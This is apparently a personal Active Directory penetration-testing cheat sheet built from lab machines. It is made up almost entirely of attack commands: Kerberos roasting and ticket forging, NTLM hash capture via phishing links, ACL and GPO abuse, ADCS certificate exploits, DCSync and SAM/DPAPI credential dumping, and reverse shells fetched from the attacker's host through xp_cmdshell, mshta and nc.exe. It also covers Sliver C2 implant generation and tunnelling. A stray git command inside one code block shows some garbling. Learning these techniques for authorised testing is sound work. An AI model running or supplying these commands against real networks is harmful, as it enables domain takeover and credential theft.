# Active-Directory Penetration Testing Process

:toc:
:toclevels: 3

== Table of Contents
- <<overview,Overview>>
- <<ports, Port Scanning>>
- <<creds, Scenario without creds and with creds>>
- <<ASREPRoast, ASREPRoast>>
- <<Kerberoasting, Kerberoasting>>
- <<Kerberos, Kerberos tickets>>
- <<SMB, SMB>>
- <<NFS, NFS>>
- <<nats, NATS>>
- <<NTLM, NTLM Relay Attack>>
- <<Bloodhound, Bloodhound>>
- <<perms, Permisions in AD>>
  * <<generetic, GenereticAll>>
  * <<generetic, GenereticWrite>>
  * <<DCSync, DCSync>>
  * <<ForceChangePassword, ForceChangePassword>>
  * <<Groups, Groups>>
  * <<WriteDacl, WriteDacl>>
  * <<GPO, GPO abuse>>
  * <<write,Write Owner>>
  * <<atribute, Atributes Change>>
- <<crack, Hashcat and John>>
  * <<hashcat, Hashcat>>
  * <<john, John>>
- <<templates, Vulnerable Certificate Templates>>
- <<rm, Remote Managment>>
  * <<evil, Evil-Winrm>>
  * <<xfreerdp, XfreeRDP>>
- <<database, Databases>>
- <<forwarding, Port-Forwarding and Sliver C2>>
- <<ssh, SSH>>
- <<privesc, Privilage Escalation>>
  * <<backup, SeBackupPrivilege>>
  * <<dpapi,  DPAPI secrets>>
  * <<delegation, SeEnableDelegationPrivilege>>
  * <<cross-session, Cross-Session>>

[[overview]]
== Overview
This CheatList includes basic attacks exists in *Active Directory* enviroment. Possible *attack vectors* and *methonology* , list of *commands* and *tools* with *vectors* , *privilage escalation* , *enumeration* and *others*

[[ports]]
== Port Scanning

Default *TCP* port scan

```bash
nmap --top-ports 1000 -sC -sV $target
```

For more ports and bigger response

```bash
nmap -p- -sC -sV -oN file.txt $target
```

Default *UDP* ports scanning 

```bash
nmap -sU --top-ports 100 -sC -sV $target          
```

Search file with string password

```bash
cd wapt && grep -R 'password'
```

DNS request

```bash
dig domain@ip
```

[[creds]]
== Scenario without creds and with creds

Two scenarios is possible ...

[[ASREPRoast]]
== ASREPRoast

This `command` returns hash of all users which doesn't have a Kerberos pre-authentication or not required


*Without Auth*

```bash

nxc ldap $target -u 'username' -p '' --asreproast output.txt
```

*By wordlist*

If exists dumped or some wordlits of users

```bash
python3 targetedKerberoast.py -v -d 'hacksmarter.local' -u 'yorinobu' -p 'FuckPass!@' 

nxc ldap $target -u user.txt -p '' --asreproast output.txt
```

*With authentication*


```bash
nxc ldap $target -u 'username' -p 'password' --asreproast output.txt
```

If failture named `domain name resolution fail`

```bash
nxc ldap 192.168.0.104 -u harry -p pass --asreproast output.txt --kdcHost domain_name
```

More info about https://www.netexec.wiki/ldap-protocol/asreproast[here]

[[Kerberoasting]]
== Kerberoasting

Kerberoasting is an attack against Active Directory where an attacker requests Kerberos service tickets for service accounts and then cracks them offline to obtain their passwords. It works because the tickets are encrypted with the service account’s password hash, which may be weak or unchanged for long periods.   
Also can be done via tool `nxc` netexec

```bash
nxc ldap $target -u 'username' -p 'username' --kerberoast output.txt
```

*Kerberoasting via AS-REP Roasting*

```bash
nxc ldap $target -u 'username' -p '' no-preauth-targets kerberoastable.list --kerberoasting output.txt
```

Brute-Force users in AD by wordlist tool `kerbrute`

```bash
kerbrute userenum --dc 'AWSJPDC0522.shibuya.vl'  -d shibuya.vl -t 10 ~/wordlists/Usernames/Names/names.txt
```

If exists error `KDC_ERR_CLIENT_REVOKED` need to enable user in AD

```bash
bloodyAD --host 10.10.10.10 -d domain -u compromised_user -p 'password' remove uac 'target_user' -f ACCOUNTDISABLE
```

[[Kerberos]]
== Kerberos ticket

This vuln can be exploited by generation ticket as Administrator for different services

```bash
impacket-ticketer -spn MSSQLSvc/breachdc.breach.vl \
-domain-sid S-1-5-21-2330692793-3312915120-706255856 \
-nthash 69596c7aa1e8daee17f8e78870e25a5c \
-dc-ip 10.129.197.45 \
-domain breach.vl \
-user-id 500 Administrator
```git checkout dev                       # Go back to dev
git pull origin dev



It's a command that i used in htb machine to generate *Kerberos* ticket as Administrator to `MSSQL` service

`-spn MSSQLSvc/breachdc.breach.vl` -> The Kerberos service you are creating a ticket for.

`-domain-sid S-1-5-21-…` -> The SID of the domain where the ticket belongs.

`-nthash <hash>` -> The NTLM hash used as the cryptographic key to sign the ticket.

`-dc-ip 10.129.197.45` -> The IP address of the domain controller.

`-domain breach.vl` -> The Active Directory domain name.

`-user-id 500` -> The RID of the user (500 = built-in Administrator).
```

If nessesary to do auth with `Kerberos Authentication` tool `impacket-getTGT` returns a `<user>.ccache` file
requirements: Target username and password

```bash
impacket-getTGT  domain/'username':'password'
```

Then when it's needed to use kerberos auth for any command , that means that nxc smb can be replaced

```bash
KRB5CCNAME=user.ccache nxc smb ...
```

If will be a problem with connection , realms configure /etc/krb5.conf

```bash
[libdefaults]
	default_realm = FRIZZ.HTB
	[realms]
	FRIZZ.HTB = {
	kdc = frizzdc.frizz.htb
	admin_server = frizzdc.frizz.htb
	}
	[domain_realm]
	.frizz.htb = FRIZZ.HTB
	frizz.htb = FRIZZ.HTB
```

machine example TheFrizz HTB

Anouther way to configure '/etc/krb5.conf' correctly it's add by 'netexec'

```bash
nxc smb dc.domain -u username -p password --generate-krb5-file name.krb5

sudo cp name.krb5 /etc/krb5.conf
```


Also for each kerberos auth must be a same time with target machine

```bash
sudo ntpdate <target_ip>
```

[[SMB]]
== SMB

Enumerate *groups* , *users* via `smb`

```bash

nxc smb $target -u 'username' -p 'password' --rid # also --rid-brute
```

Try to *anonymous* log into `shares`, can be putted into username field `guest` with no-pass

```bash
nxc smb $target -u '' -p '' --shares # guest
```

*With Auth*

```bash
smbclient '//$target/$Share'  -U username
```

*Anonymous*

```bash
smbclient '//$target/$Share' -N
```

Take all files in Share

```bash
mget *
```

Method maybe users have a pass which mathes with their username

```bash
nxc smb $target -u users.txt -p users.txt
```

Or check one pass for wordlist of users

```bash
nxc smb $target -u users.txt -p 'some_pass'
```

Also it a little bit touches *smb* if target have website and open smb port with *LFI* vuln 

```bash
http://somesite.com/index.php?file=image
```

So `image` can be replaced as `smb share` and hash can be cathed

Replace `image` 

```bash
http://somesite.com/index.php?file=\\10.10.10.10\Share
```

don't forgot to start `responder` in same network as target, replace `10.10.10.10` by your ip

Check all users by smb and write them to file

```bash
nxc smb domain -u username -p 'password' --rid-brute | grep -iE 'SidTypeUser' | grep -viE 'WINDOWS|\$' | awk '{print $6}' | awk -F'\\' '{print $2}' | tee usernames.txt
```

[[NFS]]
== NFS

It's something simmular to *SMB* but mostly a linux technology

*Enumeration*

```bash
nxc nfs domain --shares 
```

List shares

```bash
nxc nfs domain --share '/Share' --ls '/'
```

Download file

```bash
nxc nfs domain --get-file '/path/to/file/file.pdf' file.pdf
```


[[nats]]
== NATS

It's a service that can be runned in Windows machine and it's also a point for testing

Making a request by server to our server to see some details about using tool `nsupdate` to modify a `DNS` requests

Basic syntax to send request to our server

```bash
$ nsupdate 
> server target_ip
> zone domain
> update add domain@ip
# could not read owner ttl
> update add domain 10 A local_ip
> send
```

Start server

```bash
./nats-server -V # for verbous
```

Also if some creds in *REDACTED* can be used a *WireShark* to analyze request maybe it's not encoded

*NATS* main enum

```bash
# info about user
./nats -s nats://domain:4222 account info --user username --password password
# shows JetStream streams which are allowed to view by compromised user
./nats -s nats://domain:4222 stream ls --user username --password password
# shows a messages from all streams
./nats -s nats://domain:4222 stream view -a --user username --password password
```


[[NTLM]]
== NTLM Relay Attack

If exists *WRITE* permision in the `share` can be crafted a phishing link to catch `hashes` using module in tool `netexec` named *Slinky* 

Also is needed to start `responder` with `sudo` perms in target network

Agaist `tun0` can be anouther, 

Permisions
```bash
sudo responder -I tun0
```



When `responder` started craft `phish-link`




```bash
nxc smb $target -u 'username' -p 'passwords'  -M slinky -o SHARE=Share  NAME=phish SERVER=$server_in_responder 
```

Phish by `msfconsole` 
```bash
use auxiliary/fileformat/multidrop 
```

If NTLM is disabled but you must have it for some tool

Right part of hash is always returned but Left part not always so

*LM* null hash `aad3b435b51404eeaad3b435b51404ee`


[[Bloodhound]]
== Bloodhound

*BloodHound* with Neo4j is used to *map and analyze* relationships inside an Active Directory environment. By storing AD objects and their connections in a Neo4j graph database, BloodHound helps security teams.*Identify hidden attack paths, privilege escalation routes, and misconfigurations* that could be exploited to gain  higher access in the domain.

If port ralated to `ldap` is open can be grabbed info about system , also must be compromised user with valid creds.

```bash
bloodhound-python -d '$target_domain' -u 'username' -p 'password' -dc '$target_domain_controller' -c all -ns $target_ip
```

`Bloodhound` cathes an information about *Active Directory* in `.json` files

```bash
sudo neo4j start    
```

`neo4j` start database

```bash
bloodhound-cli  
```

`bloodhound-cli` starts bloodhound in *cli* , after upload all json files and start analyze

[[perms]]
== Permisions in AD

Perms which can be enumerated by tool `bloodhound`


[[generetic]]
=== GenericAll

```bash
certipy-ad auth -pfx 'the_emperor.pfx' -dc-ip 10.1.107.118
```

This permision over user gives a *full controll*, used to *change password* (common) or anouther things

Changing pass by tool `BloodyAD`

```bash
bloodyAD --host "$target" -d 'dc01.$target_domain' -u  'user' -p  'pass' set password 'user2' 'pass2'
```
So it's can be as "Change password of user2 by user with pass and change to pass2",


Changing pass in PowerShell by `PowerView.ps1`

```bash
$SecPassword = ConvertTo-SecureString 'FuckPass@!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain\target_user', $SecPassword)
```



[[generetic2]]
=== GenericWrite
*Method 1*

This permision over user can be used for changing atributes of target object so can be automated by tool `targetedKerberoast.py` , by atribute *servicePrincipalName* adds SPN and do kerberoasting. Could be cathed a hash of target user catch kerberos hash of user

```bash
python3 targetedKerberoast.py -v -d '$target_domain' -u 'username' -p 'password' 
```
*Method 2*
Can be logged as targed user to system when a password is strong or some service accounts, tool which can be used `pywhisker` && `certipy-ad` && `PKINITtools` 

1.Check if target user have *Shadow Credentials* 

```bash
pywhisker -d domain -u "username" -p "password" --target "target_object" --action "list"
```
    
2.Add *KeyCredentialLink* to target user in AD , it is doing because after taking *Kerberos TGT* as a target user

```bash
pywhisker -d domain -u "username" -p "password" --target "target_object" --action "add" --filename some_file
```

3.Add *Shadow Creds* to user , export `.pfx` certificate can be used only `certipy-ad` without `pywhisker`

```bash
certipy-ad shadow auto -u username@domain -p password -account target_user
```

4.Take a key from `pywhisker` , creates a `.ccache` file , takes Ticket Granting Ticket (*TGT*) , file `.ccache` it's where to write a TGT ticket

```bash
python3 ~/htb/Windows/PKINITtools/gettgtpkinit.py -cert-pfx "username.pfx" -pfx-pass '01mdadw0wadasdwm3ffL' domain/target_username target_username.ccache
```

4.1 Export KRB5CCNAME as a file 

```bash
export KRB5CCNAME=target_username.ccache 
```

5.Take a `NTLM` hash of target user, after can be logged in `evil-winrm`, Tools use a ASP-REP Roasting via PRIKIT key

```bash
python3 ~/htb/Windows/PKINITtools/getnthash.py -key 'c5cbc1fa0e5b8d29091864f2b1d16c4ecdcdfe7dcb331b0b4bc87d49502212dc' domain/target_username
```

Links:
 https://github.com/ShutdownRepo/pywhisker[pywhisker]
 https://www.hackingarticles.in/shadow-credentials-attack/[shadow-credentials-attack]

*GenericWrite* perm over group gives opportunity to add yourself to group

```bash
bloodyAD --host 10.10.10.10 -d domain -u 'username' -p 'password' add groupMember  'target_group' 'username'
```

[[DCSync]]
=== DCSync 

This perm is merge between *GetChanges* and *GetChangesAll* , All *secrets* can be dumped by `impacket-secretsdump`

```bash
impacket-secretsdump $domain/'$user':'$pass'@'$domain_ip'
```

[[ForceChangePassword]]
=== ForceChangePassword

Password of target user can be changed same can be done by tool `bloodyAD`

```bash
bloodyAD --host "$target" -d 'dc01.$target_domain' -u  'user' -p  'pass' set password 'user2' 'pass2'
```

[[Groups]]
=== Groups

If compromised user exists in group which have *GenericAll* or other privileges over anouther group compromised user can add self to target group

```bash
bloodyAD --host "$target" -d 'dc01.$target_domain' -u  'user' -p  'pass' add groupMember '$target_group' 'user'
```

[[WriteDacl]]
=== WriteDacl

WriteDacl this perm give us permision to modify the *Discretionary Access Control List(DACL)* so we can up privileges to whatever object in Active Directory. Can be done with PowerShell script *PowerView.ps1*

Copy PowerView to target machine

```bash
python3 -m http.server 80 # kali machine

curl http://$your_ip/PowerView.ps1 -O PowerView.ps1 # target machine
```

Anouther way more shortly

```bash
iex (iwr -usebasicparsing http://10.10.10.10/PowerView.ps1)
```

Add our user as object to group with *GenericAll* perm 

```bash
add-domainobjectacl -rights "all" -targetidentity "$target_user" -principalidentity "$compromised_user"
```

Set password for target user

```bash
$cred = ConvertTo-SecureString 'some_pass' -AsPlainText -Force
# 
set-domainuserpassword $target_user -accountpassword $cred
```

[[write]]
== Write Owner

So is's a perm which be demostrated over some group so main goal to make low priv user that have a *WriteOwner* perms over group and in goal low-priv user must be a *Group Owner* in group

1. Change a owner of object

```bash
impacket-owneredit -action write -new-owner 'low_priv_usr' -target-dn 'CN=Group_with_replacing,CN=Users,DC=domain.,DC=.domain' 'domain'/'low_priv_usr':'password' -dc-ip 10.10.10.10
```
2. Give yourself a perm to change other users in group

```bash
impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'low_priv_usr' -target-dn 'CN=Group_with_replacing,CN=Users,DC=domain.,DC=.domain' 'domain'/'low_priv_usr':'password' -dc-ip 10.10.10.10
```

3. After we can add yourself to target group with write perms to other users can be done with `BloodyAD` or `net rpc` or others i will go with `net rpc`

```bash
net rpc group addmem "target_group" "low_priv_user" -U "domain"/"low_priv_user"%'password' -S "dns_domain"
```

https://www.hackingarticles.in/abusing-ad-dacl-writeowner/[abusing-ad-dacl-writeowner]

[[GPO]]
=== GPO abuse

In `bloodhound` search `Effective Inbound GPOs` parametr to identify a `SID` and `NAME` of `GPO`

If user have *GenericAll* of other google it over *Default Domain Policy* and *Default Domain Contraoller Policy* , great tool for exploatation this is python script `pygpoabuse` .This script will add a user to AD with creds:
`john`  :  `H4x00r123..` 

usage:

```bash
python3 pygpoabuse.py domain/user:'pass' -command "powershell -exec bypass -enc JABjAGwAaQBlAG4AdAAgA...<SNIP>...AGwAbwBzAGUAKAApAA==" -dc-ip 10.10.10.10 -gpo-id "00000000-016D-11D2-945F-00C04FB984F9"
```

Harder but more safe way if you can create a user by using `SharpGPOAbuse.exe` 
requirements: `reverse shell`

1.Create a new `GPO`

```bash
New-GPO -name 'exploit' 
```

2.Create link to `DOMAIN CONTROLLERS` group from created `GPO`

```bash
New-GPLINK -name 'exploit' -target 'OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB'
```

3.Create task which runs `powershell` command with reverse shell 
payload search `reverse shell generator` -> PowerShell #3 (Base64)

```bash
.\SharpGPOAbuse.exe --AddComputerTask --GPOName exploit --Author exploit --TaskName RevShell --Command "powershell.exe" --Arguments "powershell -e JA<SNIP>AKAApAA=="
```

4.Update all gpo's which exists in system

```bash
gpupdate /force
```

[[atributes]]
== Attributes Change

Change attributs by `bloodyAD` tool for exemple logonHours. It's *LDAP*!

Get all fields in *LDAP* over target user

```bash
bloodyAD --host dc.domain -d domain -k -u username -p 'password' get object 'target_user'
```

Set a field over target user in AD

```bash
bloodyAD --host dc01.mirage.htb -d mirage.htb -k -u mark.bbond -p '1day@atime' set object javier.mmarshall logonhours -v '////////////////////////////' --b64
```

Objects can be different but this is a main syntax

Options:
`-gpo-id` taken from bloodhound in Node field

`-command` it's a reverse shell frome this https://www.revshells.com/[site]





[[crack]]
== Hashcat and John

Cracking tool used by penetration testers / red teamers. Use after dumping a hashes, open locked file by password.

[[hashcat]]
=== Hashcat

If exist some hash

```bash
hashcat hash.txt  rockyou.txt     
```

Also can be modified with flags `-m` , `-a`, with wordlist of hashes when all must be cracked

```bash
hashcat -m 0 -a 0 hash_pass.txt rockyou.txt --keep-guessing -O
```

[[john]]
=== John

If exist some locked pdf, zip or anouther
 it's all the same process

```bash
pdf2john file.pdf > hash.john 
```

For `zip` files can be used tool `zip2john`

Transform pdf hash to john format
john --show hash.john

```bash
john hash.john --wordlist:rockyou.txt
# then
john --show hash.john
```

[[templates]]
== Vulnerable Certificate Templates

The most common it's when service accounts have access to domain, should be checked template vulnerabilities. Named as ESC1 - ESC15 this how named vulnerabilities, the best tool to exploit this `certipy` or `certipy-ad`. More info https://www.thehacker.recipes/ad/movement/adcs/[here]

* First step is find vulnerability

```bash
certipy-ad find -u user@domain -p 'pass' -dc-ip $domain_ip -vulnerable
```

Returns .txt file which contains report of vulns

* Second step do request to catch template

```bash
certipy-ad req -u user -p 'password' -ca template-dc01-ca -target target_domain -template template -upn user@domain -sid S-1-1-11-3154413470-3340737026-2748725799-1601

```

`-template` taken from .txt file in field `TemplateName`
`-ca` taken from .txt file in field `Certificate Subject` looks like CN=hacks-DC01-CA
`-upn` target user in AD
`-sid` can be taken from `bloodhound` 

Returns a *.pfx* file of target user

* Third step 

```bash
certipy-ad auth -pfx 'user.pfx' -dc-ip domain_ip
```

Returns a `hash` of target user

It was example for `ESC1` vulnerable template

*ESC4* template vulnerability can be exploit by the same way.User have a dangerous privileges over templates

```bash
certipy-ad template -u 'user@domain' -p 'pass' -template template_name -dc-ip 10.10.10.10 -write-default-configuration 
```

This step is used after `find` to make a template vulnerable to *ESC1* by exploiting dangerous privileges

ESC 9 vuln cert https://www.hackingarticles.in/adcs-esc9-no-security-extension/[exploitation]

[[rm]]
== Remote Managment

If user exists in group *REMOTE MANAGEMENT USERS* or *DESKTOP REMOTE MANAGEMENT USERS* remote connection to target machine is possible by `evil-winrm` or `xfreerdp`

[[evil]]
=== Evil-Winrm

*Requirements* : user exists in group *REMOTE MANAGEMENT USERS*

*By password*

```bash
evil-winrm -i ip -u 'user' -p 'pass'
```

*By hash*

```bash
evil-winrm -i ip -u 'user' -H 'd87640b0d83dc7f90f5f30bd6789b133'
```


[[xfreerdp]]
=== XfreeRDP

*Requirements* : `RDP` port is open , user exists in *DESKTOP REMOTE MANAGEMENT USERS*

```bash
xfreerdp /v:ip   /u:user   /p:'password'  /w:1920 /h:1080 /fonts /smart-sizing
```

[[database]]
== Databases

If enumerated a database in Active Directory , attacker can connect to it by tool `impacket-mssqlclient`. Also if database is running at `localhost` , must do `Port-Forwarding`. Anouther thing is `proxychains` can be configured in `/etc/proxychains.conf` next section will be about this.

Connect to database without pivoting

```bash
impacket-mssqlclient 'domain'/'user':'password@@'@127.0.0.1 -windows-auth
```

It's also depens what creds you have if it windows or database creds if database creds delete `-windows-auth` flag

If connection is by `SOCKS5` or some other , pivoting database in localhost

```bash
proxychains4 -q impacket-mssqlclient 'domain'/'user':'password@@'@127.0.0.1 -windows-auth
```

If it connect with anouther user which have more privileges , main goal is to take `reverse shell`.

In database shell

```bash
enable_xp_cmdshell
```

Check if works

```bash
xp_cmdshell whoami
```

Reverse shell can be done go https://www.revshells.com/[here] this site creates reverse shell with your `ip` and `port` use `PowerShell #3 (Base64)` copy reverse shell command

```bash
xp_cmdshell powershell -e JAB...
```

Start listener

```bash
rlwrap nc -lvnp  9001
```

Without site can be done by `msfvenom` in `.hta` file

```bash
msfvenom -p windows/shell_reverse_tcp lhost=$your_ip lport=9001 -f hta-psh > shell.hta
```

Into database shell

```bash
xp_cmdshell "mshta http://$your_ip/shell.hta"
```

Then start listener

About reverse shells by binary files

```bash
windows-binaries -h
```

```bash
xp_cmdshell "powershell wget http://$your_ip/nc.exe -OutFile c:\UsersPublic\nc.exe"
xp_cmdshell  "c:\UsersPublic\nc.exe -e cmd.exe $your_ip &your_port"
```

Also if is finded a mysql.exe and creds

```bash
c:\path\to\mysql.exe -u username -p password -e 'show databases;'
```

Catch hash from `Microsoft SQL Server 2019` method if reverse is not able to do

1.Start responder
2.Send a request from `database` to `local` machine

```bash
EXEC master .. xp_dirtree '\\<local_machine>\Share'
```

Domain Users enumeration by database tool `msfconsole`, set options

```bash
use auxiliary/admin/mssql/mssql_enum_domain_accounts  
```

Database enumeration https://juggernaut-sec.com/mssql/[here]

[[forwarding]]
== Port-Forwarding and Sliver C2

If some services is runned at `localhost` to enumerate this


```bash
netstat -ano
```

Returns all services that is running at `machine` and returns a `PID` value - looks like 4200

```bash
tasklist 4200
```

This returns what servise is running at this port

Great tool to `Port-Forwarding` is *Sliver C2* tool more info https://sliver.sh/[here]

Also can be used for `reverse shell` in `sessions`

*Install and starting*

```bash
curl https://sliver.sh/install | sudo bash
#
sudo systemctl start sliver
#
sliver
```

Into sliver

Command generates `.exe` file which must be executed in target machine, in this example named `pivot.exe`

```bash
generate --mtls $your_ip:$your_port --save pivot.exe --os windows
```

Start listener

```bash
mtls -L $your_ip -l $your_port
```

In target machine run file

```bash
./pivot.exe
```

In `Sliver` , view and connect to session

```bash
sessions
#
sessions -i $session_id
```

$session_id looks like `5b4640a8`


Sliver C2 configured in proxy `SOCKS5` so need to change a `/etc/proxychains.conf` to `SOCKS5` in port `1081`


Anouther way to tunnel port by tool `chisel`

In local machine

```bash
./chisel server -p 8001 --reverse
```

In target machine where port `8004` it's in which port tunnel in local machine and `8000` what port in target machine to tunnel

```bash
./chisel.exe client 10.10.10.10:8001 R:8004:127.0.0.1:8000
```

[[ssh]]
== SSH

When a port `22` is open in Windows machine it can be connected the same as in linux machines

```bash
ssh username@target_ip
```

Kerberos auth to `ssh`

```bash
KRB5CCNAME=user.ccache ssh -K username@domain  -v
```

Also file can be exported

```bash
export KRB5CCNAME=user.ccache 
```

Copy a file from `ssh` connection

```bash
scp username@remote:/file/to/receive /where/to/put/locally
```

Download a file from `ssh` connection

```bash
scp -P 22 ./SharpGPOAbuse.exe m.schoolbus@frizz.htb:"C:/PATH/TO/FILE/"
```



[[privesc]]
== Privilage Escalation

Default Privileges no privilege escalation 

```bash
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```

Privilage Escalation is the same as in standarlone machines more info in this https://github.com/Neiton-cmd/PentestCheatList/blob/main/PrivEscalation/Windows.md[repo]

Certificates https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-2-ac7f925d1547[here]

[[backup]]
=== SeBackupPrivilege

```bash
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
```

So we do a copy of folowing files into `/Temp` directory

`SAM` contains local users and their hashes

`SYSTEM` contains the main it's `BootKey` if we don't have system sam is empty thing

To dump hashes of local users can be used tool `impacket-secretsdump`

```bash
impacket-secretsdump -sam sam -system system local   
```

Must return something like this

```bash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up... 
```

[[dpapi]]
=== DPAPI secrets 

The DPAPI (Data Protection API) is an internal component in the Windows system. It allows various applications to store sensitive data (e.g. passwords). The data are stored in the users directory and are secured by user-specific master keys derived from the users password. They are usually located at:

```bash
C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID
```

Below are common paths of hidden files that usually contain DPAPI-protected data.

```bash
C:\Users\$USER\AppData\Local\Microsoft\Credentials\
C:\Users\$USER\AppData\Roaming\Microsoft\Credentials\
```

1.Dump Decrypted key starts with `0x` where sid is compomised_user

```bash
impacket-dpapi masterkey -file "/path/to/file/locally/master" -sid S-1-<SNIP>-1107 -password 'compromised_password'
```
Returns a long `MD4` key

2.Dump target user password where master2 is a file from `Credentials\` directory

```bash
impacket-dpapi credential -file "/path/to/file/locally/master2" -key '0xd9a570722fbaf7149f9f<SNIP>9e9c84'
```

[[delegation]]
=== SeEnableDelegationPrivilege

Enable *Kerberos delegation* for an account or computer in AD

Scenario: low-priv user has a `SeEnableDelegationPrivilege` in remote access and has a `GenericAll` privilege over anouther computer in AD

Main goal: extract NTLM hash of `Administrator`

1.Configure password of computer

2.Also can be used tool `impacket-findDelegation` to enemurate delegations , user must have a `SeEnableDelegationPrivilege`!

```bash
impacket-findDelegation   "domain"/"user":"password"
```

3.Enable *Kerberos delegation* type: *S4U*, Computer is trusted for auth of anouther users

```bash
bloodyAD --host dc.host -d domain -u 'user' -p 'password' add uac 'computer' -f TRUSTED_TO_AUTH_FOR_DELEGATION
```

4.For what servises account have a privilege of *Kerberos delegation*, modify `msDS-AllowedToDelegateTo` attibute

```bash
bloodyAD --host dc.host -d domain  -u 'user' -p 'password' set object 'computer' msDS-
AllowedToDelegateTo -v 'smb/dc.target'
```

5.get kerberos ticket(optional)

```bash
impacket-getST domain/'computer':'password' -spn 'smb/dc.target' -impersonate dc
```

5.Extract NTLM hash of user

```bash
impacket-secretsdump -k dc.target  
```

[[cross-session]]
== Cross-Session

*Cross-Session* is able to do when two user in same computer logged in in the same time

Can be identified by

```bash
get-process # enumerate process runned on dc

qwinsta # what users is logged in
```

Some example of output

```bash
console     user      1    Active 
```

Exploitation

Start listener

```bash
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:target_machine_ip:9999
```

Run `RemotePotato0.exe` in target machine

```bash
./RemotePotato0.exe -m 2 -s 1 -x local_ip
```























